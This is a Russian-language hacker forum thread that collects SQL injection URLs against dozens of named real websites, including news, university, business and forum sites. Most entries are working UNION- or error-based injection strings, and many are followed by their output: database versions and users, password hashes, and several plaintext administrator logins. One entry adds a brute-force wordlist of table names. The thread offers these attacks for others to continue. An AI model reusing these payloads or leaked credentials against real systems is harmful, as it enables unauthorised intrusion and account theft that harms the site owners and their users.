SQL Инъекции

Газета Деловой Казахстан
PR:4

Code:

http://[COLOR=Red]www.dknews.kz[/COLOR]/leftlink.php?linkid=388&archid=-1+union+select+1,2,3,4,5/*

dknewsk@localhost:4.1.22-standard:dknewsk_manat

Посмотрите где поле '2' выводится

 

http://www.siberia-klan.ru

Code:

http://www.siberia-klan.ru/?section=creative&id=-201+union+select+1,2,username,4,user_password,6,7,8,9,10,11+from+phpbb_users+limit+1,1/*

лимитом перебираем юзеров...

 

PR:3

Code:

http://[COLOR=Red]www.velimobil.md[/COLOR]/2k.php?k=2+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

12811@localhost:5.0.27:12811

Code:

http://[COLOR=Red]www.velimobil.md[/COLOR]/2k.php?k=2+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables/*

PR:3

Code:

http://[COLOR=Red]www.studii.md[/COLOR]/work_view_vacancy_detail.php?id=-2740+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16/*

studiim_a@localhost:4.1.21:studiim_db121682571


PR:4

Code:

http://[COLOR=Red]www.youth.md[/COLOR]/index.php?id=-36+union+select+concat_ws(char(58),user(),version(),database())/*

webuser@localhost:5.0.22:youth

Code:

http://[COLOR=Red]www.youth.md[/COLOR]/index.php?id=-36+union+select+concat(user,char(58),password)+from+mysql.user/*

webuser:3011c26b11019486

 

http://www.itn.ru/
ЗАО "Интеграция связи" является оператором связи в г. Москве

HTML:

http://www.itn.ru/01/doc.php?id_nd=-28+UNION+SELECT+user,password,3+FROM+mysql.user/*

 

texe.com

Code:

http://www.[COLOR=Green]texe.com[/COLOR]/view.php?page=-74+union+select+1,concat_ws(char(58,58),user(),database(),version()),3,4,5/*  

[email protected]::texecom8::5.0.32-Debian_7etch1
ник и пасс для входа в админку:
chris:texecom

 

Code:

http://www.vcs u.[B][SIZE=3][COLOR=Lime]edu[/COLOR][/SIZE][/B]/news/php/details.php?id=-4835'+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(user,0x78),0x78),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+mysql.user+limit+1,1/*

дальше не добил

 

Code:

[B]http://www.[U]cambridge-centre[/U].ru[/B]/view.phtml?cat=2&id=-1+union+select+1,database(),3,4,5,version(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*

[email protected]
4.0.25-log
Что там еще можно сделать? я подбирал таблицы

Code:

admin
admins
idadmin
idadmins
id_admin
id_admins
adminid
adminsid
admin_id
admins_id
admintable
adminstable
adminstables
admintables
tableadmin
tablesadmin
admin_table
admin_tables
table_admin
table_admins
tables_admin
user
users
iduser
idusers
id_user
id_users
userid
usersid
user_id
users_id
usertable
userstable
userstables
usertables
tableuser
tablesuser
user_table
user_tables
table_user
table_users
tables_user
id
ids
idid
idids
id_id
ids_id
id_ids
idid
idsid
id_id
ids_id
idtable
idstable
idstables
idtables
tableid
tablesid
id_table
id_tables
table_id
table_ids
tables_id
login
logins
idlogin
idlogins
id_login
id_logins
loginid
loginsid
login_id
logins_id
logintable
loginstable
loginstables
logintables
tablelogin
tableslogin
login_table
login_tables
table_login
table_logins
tables_login
webmaster
webmasters
idwebmaster
idwebmasters
id_webmaster
id_webmasters
webmasterid
webmastersid
webmaster_id
webmasters_id
webmastertable
webmasterstable
webmasterstables
webmastertables
tablewebmaster
tableswebmaster
webmaster_table
webmaster_tables
table_webmaster
table_webmasters
tables_webmaster
master
masters
idmaster
idmasters
id_master
id_masters
masterid
mastersid
master_id
masters_id
mastertable
masterstable
masterstables
mastertables
tablemaster
tablesmaster
master_table
master_tables
table_master
table_masters
tables_master
shop
shops
idshop
idshops
id_shop
id_shops
shopid
shopsid
shop_id
shops_id
shoptable
shopstable
shopstables
shoptables
tableshop
tablesshop
shop_table
shop_tables
table_shop
table_shops
tables_shop
money
moneys
idmoney
idmoneys
id_money
id_moneys
moneyid
moneysid
money_id
moneys_id
moneytable
moneystable
moneystables
moneytables
tablemoney
tablesmoney
money_table
money_tables
table_money
table_moneys
tables_money
catalog
catalogs
idcatalog
idcatalogs
id_catalog
id_catalogs
catalogid
catalogsid
catalog_id
catalogs_id
catalogtable
catalogstable
catalogstables
catalogtables
tablecatalog
tablescatalog
catalog_table
catalog_tables
table_catalog
table_catalogs
tables_catalog
title
titles
idtitle
idtitles
id_title
id_titles
titleid
titlesid
title_id
titles_id
titletable
titlestable
titlestables
titletables
tabletitle
tablestitle
title_table
title_tables
table_title
table_titles
tables_title
name
names
idname
idnames
id_name
id_names
nameid
namesid
name_id
names_id
nametable
namestable
namestables
nametables
tablename
tablesname
name_table
name_tables
table_name
table_names
tables_name
mysql
mysqls
idmysql
idmysqls
id_mysql
id_mysqls
mysqlid
mysqlsid
mysql_id
mysqls_id
mysqltable
mysqlstable
mysqlstables
mysqltables
tablemysql
tablesmysql
mysql_table
mysql_tables
table_mysql
table_mysqls
tables_mysql
sql
sqls
idsql
idsqls
id_sql
id_sqls
sqlid
sqlsid
sql_id
sqls_id
sqltable
sqlstable
sqlstables
sqltables
tablesql
tablessql
sql_table
sql_tables
table_sql
table_sqls
tables_sql
bd
bds
idbd
idbds
id_bd
id_bds
bdid
bdsid
bd_id
bds_id
bdtable
bdstable
bdstables
bdtables
tablebd
tablesbd
bd_table
bd_tables
table_bd
table_bds
tables_bd
datebase
datebases
iddatebase
iddatebases
id_datebase
id_datebases
datebaseid
datebasesid
datebase_id
datebases_id
datebasetable
datebasestable
datebasestables
datebasetables
tabledatebase
tablesdatebase
datebase_table
datebase_tables
table_datebase
table_datebases
tables_datebase
www
wwws
idwww
idwwws
id_www
id_wwws
wwwid
wwwsid
www_id
wwws_id
wwwtable
wwwstable
wwwstables
wwwtables
tablewww
tableswww
www_table
www_tables
table_www
table_wwws
tables_www
web
webs
idweb
idwebs
id_web
id_webs
webid
websid
web_id
webs_id
webtable
webstable
webstables
webtables
tableweb
tablesweb
web_table
web_tables
table_web
table_webs
tables_web
magazin
magazins
idmagazin
idmagazins
id_magazin
id_magazins
magazinid
magazinsid
magazin_id
magazins_id
magazintable
magazinstable
magazinstables
magazintables
tablemagazin
tablesmagazin
magazin_table
magazin_tables
table_magazin
table_magazins
tables_magazin
log
logs
idlog
idlogs
id_log
id_logs
logid
logsid
log_id
logs_id
logtable
logstable
logstables
logtables
tablelog
tableslog
log_table
log_tables
table_log
table_logs
tables_log
music
musics
idmusic
idmusics
id_music
id_musics
musicid
musicsid
music_id
musics_id
musictable
musicstable
musicstables
musictables
tablemusic
tablesmusic
music_table
music_tables
table_music
table_musics
tables_music
shop
shops
idshop
idshops
id_shop
id_shops
shopid
shopids
shop_id
shop_ids
shoptable
shopstable
shoptables
tableshop
tablesshop
shop_table
shop_tables
table_shop
tables_shop
money
moneys
idmoney
idmoneys
id_money
id_moneys
moneyid
moneysid
money_id
moneys_id
moneytable
moneystable
moneystables
moneytables
tablemoney
tablesmoney
money_table
money_tables
table_money
table_moneys
tables_money

и ничего =(

 

Code:

http://[B]www.uazmadi.ru[/B]/shop.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12/*

Code:

http://[B]www.avtobamper.ru[/B]/shop.php?id=-1+union+select+1,2,version(),database(),5,6,7,user(),9,10,11,12,13/*

 

vedu.ru

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=@@version--

Microsoft SQL Server 2000 - 8.00.2040 (Intel X86) May 13 2005 18:33:17 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+system_user)-- writer

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+db_name())-- PortalDB


http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+top+1+cast(Username+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)%2B%27%3A%27%2Bcast(Salt+as+nvarchar)%2B%27%3A%27%2Bcast(Author_email+as+nvarchar)+from+frm_Author)--

логин/хеш/соль/мейл
superviser:561C4AF0B29C278947A313635ADDA7:93BE1FB7A5A:[email protected]

дальше сами )

http://www.vedu.ru/index.asp?cont=index&news=-1+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('prt_FAQ','prt_Vote','tst_razdels','dtproperties','frm_ActiveUser','frm_Author','frm_BanList','frm_blob_file',
'frm_blob_image','frm_BuddyList','frm_Category','frm_Configuration','frm_DateTimeFormat','frm_EmailNotify','frm_Forum','frm_Group','frm_GuestName','frm_Permissions','frm_PMMessage','frm_Poll',%20'frm_PollChoice','frm_Smut','frm_Thread','frm_Topic',
'frm_UserRoles','prt_announce','prt_announce_Group','prt_Articles','prt_Articles_Comment','prt_Articles_Group','prt_Articles_Ozenka','prt_Articles_Tree','prt_Articles_Tree_Permissions','prt_Connector','prt_FAQ_group','prt_Files','prt_Images','prt_Keys_Edulib',
'prt_myNavigator','prt_News','prt_News_Group','prt_part_name','prt_part_permissions','prt_Person'))-- и тд.

--------------------------------------------------------------------------
contester.tsure.ru

http://www.contester.tsure.ru/index.php?page=lectorium/main.php&catId=-1+union+select+concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary))/*

5.0.15-log/contest2/webapp@localhost


http://www.contester.tsure.ru/index.php?page=lectorium/main.php&catId=-1+union+select+concat_ws(0x2F,login,hash_password)+from+logins+limit+0,1/*

admin/*222512147AA24FDF67BC90EC2ED8B4E178D33600

--------------------------------------------------------------------------
stroy-press.ru

http://www.stroy-press.ru/?p=14&id=-1+union+select+1,2,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),4,5,6,7/*

4.1.18/ccr_ru_1/ccr@localhost


http://www.stroy-press.ru/?p=14&id=-1+union+select+1,2,concat_ws(0x2F,username,password),4,5,6,7+from+users+limit+1,1/*

логин/пароль
123/6W7FCY8X

 

http://www.mw.org.pl

Code:

http://www.mw.org.pl/t.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+phpbb_users/*

не смог подобрать колонки =(

http://www.astrotur.ru

Code:

http://www.astrotur.ru/index1.php?id=-1+union+select+1,2,3/*

ostapenko_atur@localhost
4.1.20
ostapenko_atur

 

Code:

http://www.ascon.ru/?news=361+UNION+SELECT+1,2,3,concat_ws(0x05,ID_MEMBER,ID_GROUP,memberName,passwd,passwordSalt,emailAddress),5,6+FROM+forum.smf_members+limit+1,1/*

 

www.ugatu.ac.ru

Code:

http://www.ugatu.ac.ru/Aviator/read_article.php?id=-598+union+select+1,password,3,4,5,6+from+mysql.user/*

user:csit
password:1458953a0af2898b

 

http://www.joygregory.co.uk/

Code:

http://www.joygregory.co.uk/news/details.asp?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+admin/*

 

http://www.tupelo.net/

Code:

http://www.tupelo.net/media-room/news_detail.asp?news_id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+Members+where+MemberID=2)--

http://www.baalynton.com/

Code:

http://www.baalynton.com/news.asp?news_id=-1+union+select+1,2,3,4,username,password,7,8,9,10,11+from+users/*

http://www.philipgreenfield.com/

Code:

http://www.philipgreenfield.com/index.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--

http://www.elittech.ru/

Code:

http://www.elittech.ru/info/news.asp?news_id=-1+union+select+1,2,3,4,5,6,7,8,9+from+admin/*

 

http://www.psychasoc.com

Code:

http://www.psychasoc.com/print_news.php?ID=-1+union+select+login,2,3,4,password+from+admin/*

jojo:429985a327c0097d

http://www.llatalent.com

Code:

http://www.llatalent.com/current/index.php?current_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

4.0.27-standard
[email protected]
admin_llatalent_com

 

Центр Коммерческой недвижимости (довольно известная компания)
PR:4

Code:

http://[COLOR=Red]www.ckn.ru[/COLOR]/srochnoall.php?id=-9+union+select+1,2,concat_ws(char(58),user(),version(),database()),4,5,6,7,8/*

wwwrealtor@localhost:4.0.27-1-log:wwwrealtor

 

http://www.wttrec.com/ Че-то про теннис....

Code:

http://www.wttrec.com/news/news_info.asp?news_id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users+where+user_id=1)--

Дальше перебираем по id...

 

www.hro.org

Code:

http://www.hro.org/get_rubric.php?id=999+union+select+1,password,3,4,5,6,7+from+user/*

user:hroorg
password:dancer

 

Code:

PR:4
http://www.iron.org/chamber/members.php?id=-502+union+select+1,concat(database(),0x3a,user(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
[B]usr51730_chamber:usr51730_usr5173@localhost:4.1.22-standard-log
[/B]

PR:6
http://www.eamesgallery.com/cart/prod_subcat.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,concat(database(),0x3a,user(),0x3a,version()),12,13/*
[B]eamesgal_eostore:eamesgal@localhost:4.0.27-standard
[/B]
PR:5
http://www.modculture.co.uk/books/review.php?id=-107'+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11,12,13,14,15,16,17/*
[B]4.1.20:modculture2:modculture@localhost[/B]

PR:4
http://www.intlstockexchange.com/CompanyProfile.php?id=-25+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+users/*

 

communizm.ru

Code:

http://communizm.ru/index.php?mode=comment&id=-394+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14/*

5.0.32-Debian_7etch1-log


www.avd.org.ua

Code:

http://www.avd.org.ua/viewdetails.php?id=-7146+UNION+SELECT+1,username,3,4,5,6,7,8,9,10,11,12,13,14,15+from+user/*

4.1.22-log



aufo.ru

Code:

http://www.aufo.ru/autoinfo/?page=2&id=-45+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67/*

5.0.26



reutov.net

Code:

http://reutov.net/iss/photo_news/news/newsone.php?id=-686+UNION+SELECT+1,2,3,4,name,pass,7,8,9+from+users+limit+3,1/*

name:administrator
hash:c587975a6d5d82fffbe877b0292e3cfc